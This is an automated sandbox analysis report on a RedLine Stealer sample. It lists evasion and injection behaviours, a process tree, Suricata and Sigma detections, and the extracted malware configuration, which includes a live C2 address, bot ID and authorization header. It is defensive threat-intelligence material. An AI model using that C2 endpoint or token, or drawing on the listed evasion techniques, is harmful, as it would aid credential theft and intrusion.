Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3Qv3xyyL5G.exe

Overview

General Information

Sample name:3Qv3xyyL5G.exe
renamed because original name is a hash value
Original sample name:da8fee4a89f0b7cee6c8aee970044116.exe
Analysis ID:1575324
MD5:da8fee4a89f0b7cee6c8aee970044116
SHA1:226a6fbd66992a0f2ddbf5d7572fab2cf8f5001e
SHA256:4a55da3c91388a8ea539fc750b52dd90af5d2f33f2e7269a73c2146243ed24cd
Tags:exeuser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 3Qv3xyyL5G.exe (PID: 3160 cmdline: "C:\Users\user\Desktop\3Qv3xyyL5G.exe" MD5: DA8FEE4A89F0B7CEE6C8AEE970044116)
    • audiodg.exe (PID: 6476 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
    • svchost.exe (PID: 2800 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • 25A2.tmp.ssg.exe (PID: 3340 cmdline: "C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)
        • 65D35BAB97073674480464.exe (PID: 5216 cmdline: "C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe" MD5: DA8FEE4A89F0B7CEE6C8AEE970044116)
          • svchost.exe (PID: 4424 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 5924 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 2664 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
        • 4F82.tmp.zx.exe (PID: 3768 cmdline: "C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe" MD5: B40682DDC13C95E3C0228D09A3B6AAE2)
          • 4F82.tmp.zx.exe (PID: 3344 cmdline: "C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe" MD5: B40682DDC13C95E3C0228D09A3B6AAE2)
        • 65D35BAB97073674480464.exe (PID: 4424 cmdline: "C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe" MD5: DA8FEE4A89F0B7CEE6C8AEE970044116)
          • svchost.exe (PID: 5796 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 6632 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 1628 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 796 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000006.00000000.1604653153.0000000000A92000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000005.00000003.1603564510.000000000A37C000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Process Memory Space: explorer.exe PID: 4084JoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Process Memory Space: 25A2.tmp.ssg.exe PID: 3340JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 1 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  6.0.25A2.tmp.ssg.exe.a90000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                    Sigma Signatures

                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\3Qv3xyyL5G.exe, ProcessId: 3160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services
                    Sigma detected: Remote Thread Creation By Uncommon Source Image
                    Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\msiexec.exe, SourceProcessId: 796, StartAddress: B990000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 4084
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\3Qv3xyyL5G.exe", ParentImage: C:\Users\user\Desktop\3Qv3xyyL5G.exe, ParentProcessId: 3160, ParentProcessName: 3Qv3xyyL5G.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 2800, ProcessName: svchost.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\3Qv3xyyL5G.exe", ParentImage: C:\Users\user\Desktop\3Qv3xyyL5G.exe, ParentProcessId: 3160, ParentProcessName: 3Qv3xyyL5G.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 2800, ProcessName: svchost.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-15T09:15:41.244052+010020432341A Network Trojan was detected185.81.68.1471912192.168.2.849710TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-15T09:15:40.808505+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:46.385085+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:46.965924+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:47.644462+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:48.092095+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:48.680893+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:50.109463+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:50.545600+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:51.079216+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:51.738040+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:52.178919+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:52.641511+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:53.079450+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:53.587067+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:53.662671+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:53.782925+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:55.164720+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:55.663474+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:56.097887+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:56.569250+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:57.078303+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:57.601815+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:58.078783+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:58.569508+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    2024-12-15T09:15:59.162461+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-15T09:15:47.085853+010020460561A Network Trojan was detected185.81.68.1471912192.168.2.849710TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-15T09:15:36.515937+010020197142Potentially Bad Traffic192.168.2.849708185.81.68.14780TCP
                    2024-12-15T09:15:39.133643+010020197142Potentially Bad Traffic192.168.2.849709185.81.68.14780TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-15T09:15:40.808505+010020460451A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://185.81.68.147/VzCAHn.php?65D35BAB97073674480464Avira URL Cloud: Label: phishing
                    Found malware configuration
                    Source: 6.0.25A2.tmp.ssg.exe.a90000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeReversingLabs: Detection: 91%
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeReversingLabs: Detection: 34%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\5995.tmp.update.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: 3Qv3xyyL5G.exeJoe Sandbox ML: detected
                    Source: 3Qv3xyyL5G.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718679302.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1719019132.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.12.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715832492.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.12.dr
                    Source: Binary string: ucrtbase.pdb source: 4F82.tmp.zx.exe, 0000000D.00000002.1742961864.00007FFBABB05000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716704355.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715488670.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.12.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717832720.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718462357.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1719137537.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 4F82.tmp.zx.exe, 0000000D.00000002.1743144237.00007FFBBCF81000.00000002.00000001.01000000.0000000D.sdmp, _ctypes.pyd.12.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716149257.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718036693.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717598102.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718356557.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715598942.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: vcruntime140.amd64.pdbGCTL source: 4F82.tmp.zx.exe, 0000000C.00000003.1713559075.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000D.00000002.1743510922.00007FFBC31DE000.00000002.00000001.01000000.0000000C.sdmp, VCRUNTIME140.dll.12.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717026450.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715267455.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715709268.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718252732.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.12.dr
                    Source: Binary string: .PdB] source: 4F82.tmp.zx.exe.5.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: 25A2.tmp.ssg.exe, 00000006.00000002.1822658401.0000000001153000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.12.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717251759.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.12.dr
                    Source: Binary string: ucrtbase.pdbUGP source: 4F82.tmp.zx.exe, 0000000D.00000002.1742961864.00007FFBABB05000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: vcruntime140.amd64.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1713559075.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000D.00000002.1743510922.00007FFBC31DE000.00000002.00000001.01000000.0000000C.sdmp, VCRUNTIME140.dll.12.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1719456434.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716038423.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717728480.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716919388.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715383363.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ServiceModel.pdb source: 25A2.tmp.ssg.exe, 00000006.00000002.1834821304.0000000006223000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718142742.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.12.dr
                    Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 4F82.tmp.zx.exe, 0000000D.00000002.1742366761.00007FFBAA8DD000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718786664.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716582667.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717144608.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.12.dr
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716816442.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1719807537.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717361519.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717934475.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717474841.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715936090.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718898894.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716463638.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716359569.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.12.dr
                    Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718566536.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1719315915.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF7293479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,12_2_00007FF7293479B0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF7293485A0 FindFirstFileExW,FindClose,12_2_00007FF7293485A0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729360B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00007FF729360B84
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF7293485A0 FindFirstFileExW,FindClose,13_2_00007FF7293485A0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF7293479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00007FF7293479B0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729360B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_00007FF729360B84
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAC303C FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBABAC303C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAC3280 FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBABAC3280

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.8:49710 -> 185.81.68.147:1912
                    Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.8:49710 -> 185.81.68.147:1912
                    Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.8:49710
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.8:49710
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80Jump to behavior
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 185.81.68.147:1912
